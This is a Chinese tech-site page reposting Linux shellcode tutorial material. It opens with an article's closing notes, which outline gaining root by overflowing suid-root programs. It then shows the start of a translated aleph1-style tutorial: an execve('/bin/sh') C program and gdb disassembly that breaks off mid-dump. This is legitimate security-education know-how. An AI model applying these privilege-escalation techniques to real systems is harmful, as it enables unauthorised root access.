|
|
域名空间 下载中心 社区论坛 信息公告 MY小屋 | |
 |
联系我们 设为首页 加入收藏 |
 |
|
 |
首页 | 新闻资讯 | 编程开发 | 网页设计 | 图形图象 | 网络媒体 | 网站模板 | 数 据 库 | 投稿 论坛 | 操作系统 | 系统优化 | 网络安全 | 黑客技术 | 硬件学堂 | 硬件报价 | 服 务 器 | 地图 专题 | 应用软件 | 聊天通讯 | Q Q 专栏 | 建站经验 | 在线工具 | 站长Club | 注 册 表 | 旧版 社会 | 游戏娱乐 | 设计欣赏 | 疑难解答 | 社区论坛 | 韩国素材 | 素材图库 | 广告服务 | 服务 |
 |
 |
 |
 当前位置:首页>>服 务 器>>Linux服务器>>正文 |
新版上线![旧版] |  |
|||
注:打开慢时请稍等
书写Linux下自己的shellcodehttp://www.iyit.net 日期:2006-4-29 23:23:54 来源: 点击: |
简单说两句。从纯粹的攻击角度而言,首先要寻找那些suid/sgid的属主 是root的应用程序,然后判断该应用程序是否可能发生缓冲区溢出,继而 抢在应用程序结束之前嵌入自己的shellcode,因为应用程序结束之前一般 而言还处在suid状态,那么此时执行的shellcode也就具有了suid特性, 于是拥有root权限的shell展现在你的眼前,还等什么?关于缓冲区溢出 本身回头再经典回放,力争做到通俗易懂,可以照猫画老虎,今天不提它了,:-) 3. 如何写Sun工作站上的shellcode? 建议去绿色兵团的Unix系统安全论坛学习这方面的知识,tt目前坐镇那里, 倒是展开了不少技术讨论,你可以只看不吭声,嘿嘿。 不过,只要稍微花点时间看看answer book中关于Sun工作站上的汇编那一 部分,原理是一致的,而且GNU工具也不是没有,如果你一定喜欢gdb而不是 dbx的话,faint 我是没有Sun工作站可以用了,否则今天就以它为例子来演习,可惜。 ★ 后记 最后再次向aleph1致敬,感谢tt为我们大家翻译整理了它。 要是多一些这样的朋友,系统安全一定可以得到实质性提高。 BTW,讨厌听别人说,怎么怎么黑了谁谁。 ◆ Shell Code 的编写 日期:1999-10-15 下面是一个创建Shell的C程序shellcode.c: (本文以IntelX86上的Linux为例说明) void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } 我们先将它编译为执行代码,然后再用gdb来分析一下.(注意编译时要用-static选项,否则 execve的代码将不会放入执行代码,而是作为动态链接在运行时才链入.) ------------------------------------------------------------------------------ [aleph1]$ gcc -o shellcode -ggdb -static shellcode.c [aleph1]$ gdb shellcode GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc... (gdb) disassemble main Dump of assembler code for function main: 0x8000130 : pushl %ebp 0x8000131 : movl %esp,%ebp 0x8000133 : subl $0x8,%esp 0x8000136 : movl $0x80027b8,0xfffffff8(%ebp) 0x800013d : movl $0x0,0xfffffffc(%ebp) 0x8000144 : pushl $0x0 0x8000146 : leal 0xfffffff8(%ebp),%eax 0x8000149 : pushl %eax 0x800014a : movl 0xfffffff8(%ebp),%eax 0x800014d : pushl %eax 0x800014e : call 0x80002bc %26lt;__execve%26gt; 0x8000153 : addl $0xc,%esp 0x8000156 : movl %ebp,%esp 0x8000158 : popl %ebp 0x8000159 : ret End of assembler dump. (gdb) disassemble __execve Dump of assembler code for function __execve: 0x80002bc %26lt;__execve%26gt;: pushl %ebp 0x80002bd %26lt;__execve+1%26gt;: movl %esp,%ebp 0x80002bf %26lt;__execve+3%26gt;: pushl %ebx 0x80002c0 %26lt;__execve+4%26gt;: movl $0xb,%eax 0x80002c5 %26lt;__execve+9%26gt;: movl 0x8(%ebp),%ebx 0x80002c8 %26lt;__execve+12%26gt;: movl 0xc(%ebp),%ecx 0x80002cb %26lt;__execve+15%26gt;: movl 0x10(%ebp),%edx 0x80002ce %26lt;__execve+18%26gt;: int $0x80 0x80002d0 %26lt;__execve+20%26gt;: movl %eax,%edx 0x80002d2 %26lt;__execve+22%26gt;: testl %edx,%edx 0x80002d4 %26lt;__execve+24%26gt;: jnl 0x80002e6 %26lt;__execve+42%26gt; 0x80002d6 %26lt;__execve+26%26gt;: negl %edx 0x80002d8 %26lt;__execve+28%26gt;: pushl %edx 0x80002d9 %26lt;__execve+29%26gt;: call 0x8001a34 %26lt;__normal_errno_location%26gt; 编辑: [发送给好友] [打印本页] [关闭窗口] [返回顶部] 上一篇:Linux开发人员发布WindowsXP仿真桌面 下一篇:FreeBSDshellcode编写攻略 转载请注明来源:www.iyit.net 特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。 |
| 最新更新 | 热点排行 | 推荐新闻 | |||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||
| 友情链接 | ||||||
 |
设置首 页 - 版权声明 - 广告服务 - 关于我们 - 联系我们 - 友情连接 |  |
| |||||||
易特网络技术